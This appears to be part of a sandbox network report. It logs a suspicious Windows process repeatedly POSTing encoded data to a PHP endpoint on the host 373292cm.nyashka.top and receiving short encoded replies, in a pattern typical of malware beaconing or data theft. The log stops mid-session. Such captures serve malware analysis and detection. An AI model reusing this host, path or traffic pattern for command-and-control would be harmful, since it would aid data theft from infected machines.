                                    Aug 25, 2024 15:46:23.955229044 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:24.365999937 CEST2544OUTData Raw: 5a 55 5c 55 51 47 54 5b 5b 5f 5a 51 59 55 58 55 57 50 5d 5e 57 5a 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZU\UQGT[[_ZQYUXUWP]^WZS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.; /@5[7 #9\).,\+-)='#Z+W W#*:?Y"0\/.&F$.Y/-
                                    Aug 25, 2024 15:46:24.622371912 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:24.750601053 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.84976180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:24.872899055 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:25.232456923 CEST2544OUTData Raw: 5f 5c 5c 5e 54 44 54 5d 5b 5f 5a 51 59 56 58 51 57 5d 5d 5a 57 5a 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _\\^TDT][_ZQYVXQW]]ZWZSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/#;C"' 3:=(?>7]744!V+70.>&F$.Y/!
                                    Aug 25, 2024 15:46:25.566421986 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:25.764579058 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.84976280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:25.888072968 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:26.245989084 CEST2544OUTData Raw: 5a 50 5c 55 54 45 54 58 5b 5f 5a 51 59 51 58 56 57 59 5d 5e 57 51 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZP\UTETX[_ZQYQXVWY]^WQS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X,0$6;7%Z+.,](>!Z)=7'W ,P+9#\#V=X,&F$.Y/=


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.84976380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:26.347616911 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1836
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:26.723974943 CEST1836OUTData Raw: 5f 50 5c 50 54 40 54 51 5b 5f 5a 51 59 56 58 5e 57 5d 5d 5d 57 59 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _P\PT@TQ[_ZQYVX^W]]]WYSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,##E"43*+=4^(>"(]4?/W4!$R(9]#",&F$.Y/!
                                    Aug 25, 2024 15:46:27.015506029 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:27.215221882 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1f 2a 35 32 59 26 05 0d 0c 25 23 0f 0f 2b 3d 27 10 3e 04 3a 07 25 28 2e 04 31 3e 27 09 27 38 21 5c 3c 3e 3a 56 25 2f 27 5b 2c 34 2b 5d 0c 13 21 05 23 14 35 02 26 2c 28 59 29 16 23 5d 22 2f 25 04 28 14 07 19 2b 3f 2c 5f 3f 29 0a 05 3f 2a 2e 57 3b 38 35 17 2e 1e 39 0f 37 2e 2b 52 0d 11 24 56 29 3e 21 1e 2a 3e 2b 5c 36 06 3b 5f 27 3d 26 1c 26 32 00 52 24 17 3b 03 32 22 13 1f 30 32 3d 1f 24 2b 3e 1c 26 3f 07 12 35 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &*52Y&%#+='>:%(.1>''8!\<>:V%/'[,4+]!#5&,(Y)#]"/%(+?,_?)?*.W;85.97.+R$V)>!*>+\6;_'=&&2R$;2"02=$+>&?5#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    51192.168.2.84976480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:26.467586994 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:26.826370001 CEST2544OUTData Raw: 5f 53 5c 55 51 45 54 5a 5b 5f 5a 51 59 5e 58 55 57 59 5d 52 57 5c 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\UQETZ[_ZQY^XUWY]RW\SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X8 "X #*>-3(>*?;7'V W8+9 "35_,>&F$.Y/
                                    Aug 25, 2024 15:46:27.131504059 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:27.266408920 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    52192.168.2.84976580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:27.390300035 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:27.746673107 CEST2536OUTData Raw: 5a 56 5c 5e 54 44 51 5c 5b 5f 5a 51 59 57 58 50 57 50 5d 5e 57 5f 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^TDQ\[_ZQYWXPWP]^W_S]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;0#B"0#0*[/>=&+=4 +R73+)4V!/>&F$.Y/
                                    Aug 25, 2024 15:46:28.063322067 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:28.191332102 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    53192.168.2.84976680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:28.311752081 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:28.672465086 CEST2544OUTData Raw: 5f 53 5c 54 54 44 54 5a 5b 5f 5a 51 59 55 58 55 57 50 5d 52 57 51 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\TTDTZ[_ZQYUXUWP]RWQSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/0 6-7 !=4_<>-Z<.?\ <41/+3Y4)^/&F$.Y/-
                                    Aug 25, 2024 15:46:28.985268116 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:29.119193077 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    54192.168.2.84976780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:29.247684002 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:29.612335920 CEST2544OUTData Raw: 5f 51 5c 55 51 40 54 59 5b 5f 5a 51 59 55 58 54 57 5b 5d 52 57 5a 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\UQ@TY[_ZQYUXTW[]RWZSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/0#C"(^#%*3<..)=]4< Q*)7# 1;.&F$.Y/-
                                    Aug 25, 2024 15:46:29.919277906 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:30.046088934 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    55192.168.2.84976880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:30.170511007 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:30.527092934 CEST2544OUTData Raw: 5a 55 5c 5e 51 43 54 5b 5b 5f 5a 51 59 5f 58 53 57 5d 5d 5b 57 5f 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZU\^QCT[[_ZQY_XSW]][W_S_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.\/3+E"-8] 9[+=\+>!_?#,S#W;<:#^# &/.&F$.Y/
                                    Aug 25, 2024 15:46:30.837630033 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:31.035548925 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    56192.168.2.84976980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:31.159673929 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:31.512007952 CEST2544OUTData Raw: 5a 51 5c 53 51 47 51 5c 5b 5f 5a 51 59 54 58 51 57 51 5d 5e 57 5d 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\SQGQ\[_ZQYTXQWQ]^W]SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.^8<">$4V*>/>>([#X"<$42/+7 %\.>&F$.Y/)
                                    Aug 25, 2024 15:46:31.823472977 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:32.063152075 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    57192.168.2.84977080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:32.470247030 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    58192.168.2.84977180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:32.493345022 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:32.842670918 CEST2536OUTData Raw: 5f 56 5c 57 54 42 51 5e 5b 5f 5a 51 59 57 58 51 57 5c 5d 5e 57 5c 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\WTBQ^[_ZQYWXQW\]^W\SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8U3E5"#6*,(!_?( 0!1??*#_ 18>&F$.Y/=
                                    Aug 25, 2024 15:46:33.163810968 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:33.298940897 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    59192.168.2.84977280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:33.418369055 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:33.777101040 CEST2544OUTData Raw: 5f 53 5c 57 54 40 54 5b 5b 5f 5a 51 59 54 58 53 57 5c 5d 53 57 5e 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\WT@T[[_ZQYTXSW\]SW^SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;#8!4 1Z==X<[?=$ Z ! P()##!X;>&F$.Y/)
                                    Aug 25, 2024 15:46:34.093650103 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:34.226552010 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    60192.168.2.84977380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:34.356082916 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:34.775562048 CEST2544OUTData Raw: 5a 56 59 53 51 44 54 58 5b 5f 5a 51 59 52 58 5f 57 5a 5d 53 57 5c 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZVYSQDTX[_ZQYRX_WZ]SW\SXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./U;D6>$_ 06)=+(>.<=+ 042#<9"35;.&F$.Y/1
                                    Aug 25, 2024 15:46:35.060540915 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:35.194092989 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    61192.168.2.84977480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:35.326463938 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:35.683312893 CEST2544OUTData Raw: 5a 52 5c 51 54 49 54 59 5b 5f 5a 51 59 50 58 57 57 5d 5d 5b 57 51 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
